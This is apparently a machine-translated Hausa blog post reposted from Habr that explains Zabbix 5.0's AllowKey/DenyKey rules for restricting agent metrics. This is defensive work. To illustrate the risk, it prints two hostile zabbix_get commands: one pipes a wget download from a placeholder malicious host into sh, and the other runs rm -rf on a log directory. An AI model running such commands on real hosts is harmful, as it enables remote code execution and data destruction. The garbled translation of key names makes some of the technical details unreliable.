ProHoster > Блог > Gudanarwa > Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Baƙaƙe da goyan bayan lissafin baƙaƙe don ma'auni na gefen wakili

Tikhon Uskov, Injiniya Haɗin Kai, Zabbix

Matsalolin tsaro na bayanai

Zabbix 5.0 yana da sabon fasalin da zai ba ku damar inganta tsaro a cikin tsarin ta amfani da Agent Zabbix kuma ya maye gurbin tsohuwar siga. KunnaBayanin umarni.

Haɓakawa a cikin tsaro na tsarin tushen wakili ya samo asali ne daga gaskiyar cewa wakili na iya yin babban adadin ayyuka masu haɗari.

  • Wakilin na iya tattara kusan kowane bayani, gami da bayanan sirri ko mai yuwuwar haɗari, daga fayilolin daidaitawa, fayilolin log, fayilolin kalmar sirri, ko kowane fayiloli.

Misali, ta amfani da zabbix_get utility zaka iya samun damar jerin masu amfani, kundayen adireshi na gida, fayilolin kalmar sirri, da sauransu.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Samun damar bayanai ta amfani da zabbix_get utility

NOTE. Za'a iya dawo da bayanai kawai idan wakilin ya karanta izini akan fayil ɗin da ya dace. Amma, misali, fayil /da sauransu/passwd/ mai karantawa ta duk masu amfani.

  • Wakilin kuma na iya aiwatar da umarni masu haɗari masu haɗari. Misali, key*tsarin.run[]** yana ba ku damar aiwatar da kowane umarni mai nisa akan nodes na cibiyar sadarwa, gami da rubutun gudana daga mahaɗin yanar gizo na Zabbix waɗanda kuma ke aiwatar da umarni a gefen wakili. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • A Linux, wakilin yana gudana ta tsohuwa ba tare da tushen gata ba, yayin da a kan Windows yana aiki azaman sabis azaman System kuma yana da damar shiga tsarin fayil mara iyaka. Saboda haka, idan ba a yi canje-canje ga sigogin Zabbix Agent bayan shigarwa ba, wakilin yana da damar yin rajista, tsarin fayil kuma yana iya aiwatar da tambayoyin WMI.

A cikin sigar farko da siga EnableRemoteCommands=0 an ba da izini kawai don kashe awo tare da maɓallin *tsarin.run[]** da kuma gudanar da rubutun daga mahaɗar yanar gizo, amma babu wata hanya ta hana damar yin amfani da fayiloli guda ɗaya, ba da izini ko musaki maɓalli ɗaya waɗanda aka shigar tare da wakili, ko iyakance amfani da sigogi ɗaya.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Yin amfani da ma'aunin EnableRemoteCommand a cikin sigogin farko na Zabbix

AllowKey/DenyKey

Zabbix 5.0 yana taimakawa kare kariya daga irin wannan damar mara izini ta hanyar samar da masu ba da izini da baƙar fata don ba da izini da ƙin ƙididdige awo a gefen wakili.

A cikin Zabbix 5.0 duk maɓallan, gami da *tsarin.run[]** an kunna, kuma an ƙara sabbin zaɓuɓɓukan saitin wakili guda biyu:

AllowKey = - cak masu izini;

DenyKey= - haramtattun cak;

ina tsarin suna mai maɓalli tare da sigogi waɗanda ke amfani da meta haruffa (*).

Maɓallan AllowKey da DenyKey suna ba ku damar ba da izini ko hana ma'auni guda ɗaya dangane da takamaiman tsari. Ba kamar sauran sigogin sanyi ba, adadin sigogin AllowKey/DenyKey bai iyakance ba. Wannan yana ba ku damar bayyana ainihin abin da wakili zai iya yi a cikin tsarin ta hanyar ƙirƙirar bishiyar cak - maɓallin aiwatarwa, inda tsarin da aka rubuta su yana taka muhimmiyar rawa.

Jerin dokoki

Ana duba ƙa'idodin a cikin tsari da aka shigar da su cikin fayil ɗin daidaitawa. Ana duba maɓalli bisa ga ƙa'idodi kafin wasan farko, kuma da zaran maɓallin ɓangaren bayanan ya dace da tsarin, ana ba da izini ko hana shi. Bayan wannan, bincika ƙa'idar yana tsayawa kuma ana watsi da sauran maɓallan.

Don haka, idan wani abu ya yi daidai da izini da ƙa'idar ƙin yarda, sakamakon zai dogara ne akan wanne ƙa'ida ce ta farko a cikin fayil ɗin daidaitawa.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

2 daban-daban dokoki tare da tsari iri ɗaya da maɓalli vfs.file.size[/tmp/file]

Tsarin amfani da maɓallin AllowKey/DenyKey:

  1. ainihin dokoki,
  2. dokokin gama gari,
  3. haramtacciyar doka.

Misali, idan kuna buƙatar samun damar yin amfani da fayiloli a cikin takamaiman babban fayil, dole ne ku fara ba da izinin shiga su, sannan ku ƙaryata duk abin da bai faɗi cikin izini da aka kafa ba. Idan aka fara amfani da ƙa'idar ƙin yarda, za a hana samun dama ga babban fayil ɗin.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Madaidaicin jeri

Idan kuna buƙatar ƙyale kayan aikin 2 suyi aiki ta hanyar *tsarin.run[]**, kuma za a fara ƙayyadadden ƙa'idar ƙin yarda, ba za a ƙaddamar da kayan aikin ba, saboda tsarin farko koyaushe zai dace da kowane maɓalli, kuma za a yi watsi da ƙa'idodi na gaba.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Jerin da ba daidai ba

Alamu

Ka'idoji na asali

Alamar magana ce tare da katuna. Ƙwararren haruffa (*) yayi daidai da kowane adadin kowane haruffa a takamaiman matsayi. Za'a iya amfani da haruffan maɓalli duka biyu a cikin maɓalli kuma a cikin sigogi. Misali, zaku iya tantance ma'anar farko tare da rubutu, kuma saka na gaba a matsayin kati.

Dole ne a haɗa ma'auni a cikin madaurin murabba'i [].

  • system.run[* - kuskure
  • vfs.file*.txt] - kuskure
  • vfs.file.*[*] - dama

Misalai na yin amfani da kati.

  1. A cikin maɓalli sunan kuma a cikin siga. A wannan yanayin, maɓalli ba ya dace da maɓalli mai kama da wanda ba ya ƙunshi ma'auni, tun da a cikin tsarin mun nuna cewa muna so mu sami wani ƙarshen sunan maɓallin da wasu sigogi.
  2. Idan ƙirar ba ta amfani da maƙallan murabba'i, ƙirar tana ba da damar duk maɓallan da ba su ƙunshi sigogi ba kuma ya musanta duk maɓallan da ke ɗauke da ƙayyadaddun siga.
  3. Idan an rubuta maɓalli cikakke kuma an ƙayyade sigogi a matsayin kati, zai dace da kowane maɓalli mai kama da kowane sigogi kuma ba zai dace da maɓalli ba tare da maƙallan murabba'i ba, watau za a yarda ko hana shi.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Dokokin cika sigogi.

  • Idan ana nufin amfani da maɓalli tare da sigogi, dole ne a ƙayyade sigogi a cikin fayil ɗin daidaitawa. Dole ne a ƙayyade ma'auni a matsayin ma'auni. Wajibi ne a hankali ƙin samun damar yin amfani da kowane fayil kuma la'akari da irin bayanan da ma'aunin zai iya bayarwa a ƙarƙashin haruffa daban-daban - tare da kuma ba tare da sigogi ba.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Siffofin maɓallan rubutu tare da sigogi

  • Idan an ayyana maɓalli tare da sigogi, amma sigogin na zaɓi ne kuma ƙayyadaddun su azaman metacharacter, za a warware maɓalli marar sigogi. Misali, idan kuna son musaki bayanan karɓar bayanai game da kaya akan CPU kuma saka cewa tsarin tsarin.cpu.load[*] yakamata a kashe, kar ku manta cewa maɓalli ba tare da sigogi ba zai dawo da matsakaicin ƙimar kaya.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Dokokin cika sigogi

Bayanan kula

gyara

  • Wasu dokoki ba za a iya canza su ta mai amfani ba, misali, dokokin ganowa ko dokokin rajista na atomatik. Dokokin AllowKey/DenyKey ba sa shafar sigogi masu zuwa:
    - Sunan mai watsa shiri
    - Mai watsa shiriMetadataItem
    - Mai watsa shiriInterfaceItem

NOTE. Idan mai gudanarwa ya kashe maɓalli, lokacin da aka tambaye shi, Zabbix baya bayar da bayani game da dalilin da yasa ma'aunin ko maɓalli ya faɗi cikin ' categoryBA A GOYON BA'. Bayani game da hani kan aiwatar da umarni mai nisa kuma ba a nuna su a cikin fayilolin log ɗin wakili ba. Wannan saboda dalilai na tsaro ne, amma yana iya dagula gyara gyara idan ma'auni ya faɗi cikin wani nau'in mara tallafi saboda wasu dalilai..

  • Kada ku dogara ga kowane takamaiman tsari don haɗa fayilolin sanyi na waje (misali, a cikin tsari na haruffa).

Ayyukan Layin Umurni

Bayan kafa dokoki, kuna buƙatar tabbatar da cewa an daidaita komai daidai.

Kuna iya amfani da ɗayan zaɓuɓɓuka uku:

  • Ƙara awo zuwa Zabbix.
  • Gwada da zabbix_agent. Wakilin Zabbix tare da zaɓi - buga (-p) yana nuna duk maɓallan (waɗanda aka ba da izini ta tsohuwa) sai waɗanda ba su da izini ta hanyar daidaitawa. Kuma tare da zabin -gwaji (-t) don mabuɗin haram zai dawo'Maɓallin abu mara tallafi'.
  • Gwada da zabbix_samun. Amfani zabbix_samun tare da zabin -k zai dawo'ZBX_NOTSUPPORTED: Ba a sani ba awo'.

Bada ko hana

Kuna iya ƙin samun dama ga fayil kuma tabbatar da, misali, ta amfani da mai amfani zabbix_samunan hana samun damar shiga fayil ɗin.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

**

NOTE. An yi watsi da maganganun da ke cikin siga.

A wannan yanayin, ana iya ba da damar isa ga irin wannan fayil ta wata hanya dabam. Misali, idan alamar alamar ta kai shi.

Baƙaƙe da goyan bayan jerin baƙaƙe don ma'aunin wakilai a cikin Zabbix 5.0

Ana ba da shawarar duba zaɓuɓɓuka daban-daban don yin amfani da ƙayyadaddun ƙa'idodin, da kuma la'akari da yuwuwar ƙetare abubuwan da aka haramta.

Tambayoyi da Amsoshin

Tambayarku. Me yasa aka zaɓi irin wannan hadadden tsari tare da harshensa don bayyana dokoki, izini da hani? Me ya sa bai yiwu a yi amfani da, misali, maganganun yau da kullum da Zabbix ke amfani da su ba?

Amsa. Wannan batun aikin regex ne tunda yawanci wakili ɗaya ne kawai kuma yana bincika adadi mai yawa. Regex aiki ne mai nauyi sosai kuma ba za mu iya duba dubunnan awo ta wannan hanya ba. Wildcards - duniya, yadu amfani da sauki bayani.

Tambayarku. Ba a haɗa fayilolin Haɗa cikin jerin haruffa ba?

Amsa. Kamar yadda na sani, ba zai yuwu a iya hasashen tsarin da za a yi amfani da su ba idan kun yada dokoki a cikin fayiloli daban-daban. Ina ba da shawarar tattara duk dokokin AllowKey/DenyKey a cikin Haɗa fayil ɗaya, saboda suna hulɗa da juna, gami da wannan fayil ɗin..

Tambayarku. A cikin Zabbix 5.0 zaɓi 'EnableRemoteCommands=' ya ɓace daga fayil ɗin daidaitawa, kuma AllowKey/DenyKey kawai akwai?

Amsa. E haka ne.

Na gode da hankali!

source: www.habr.com

Add a comment